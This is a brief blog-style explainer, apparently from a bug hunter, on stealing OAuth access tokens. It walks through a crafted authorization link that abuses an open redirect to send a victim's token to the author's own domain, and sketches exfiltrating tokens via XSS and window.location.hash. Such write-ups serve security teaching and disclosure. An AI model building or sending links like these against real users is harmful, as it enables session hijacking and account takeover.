What is OAuth?
First of all if you don't know yet what is Oauth (Open Authorization) this is a brief description from wikipedia :
"OAuth is an open standard for authorization. OAuth provides a method for clients to access server resources on behalf of a resource owner such as a different client or an end-user."
For more info you can check these external links:
- There is always a possibility to the Access Token to go to a non-authorized party either while authentication or get stolen from where it is stored (eg: Database).
- There also a chance to Brute Force the Access Token.
Steal the Access Token
Here we go!!! Let's say we are targeting an application -third party- we called dodydady it's main domain is www.dodydady.com and it's used to all OAuth exchanges.
After we checked www.dodydady.com we found that it's vulnerable to open redirection PoC: www.dodydady.com/redirect?to=http://google.com.
This vulnerablity allows us to hijack a user of dodydady to click on a link looks like this http://provider.url/endpoint?client_id=123456&redirect_uri=www.dodydady.com/redirect?to=http://aminecherrai.com/&response_type=token. This link will redirect the user to http://www.dodydady.com/redirect?to=http://aminecherrai.com/#access_tocken=XXXXX then to http://aminecherrai.com/#access_tocken=XXXXX and PWN we have his Access Tocken.
Dodydady has fixed this bug but I will write an article about how to bypass redirection filters.
Another bug can lead to steal Access Token is XSS. We have just to redirect the user to the XSSed page, read the hash from the url (using eg: window.location.hash) and send it to our website (via eg: src, redirect or even AJAX).
To Be Updated.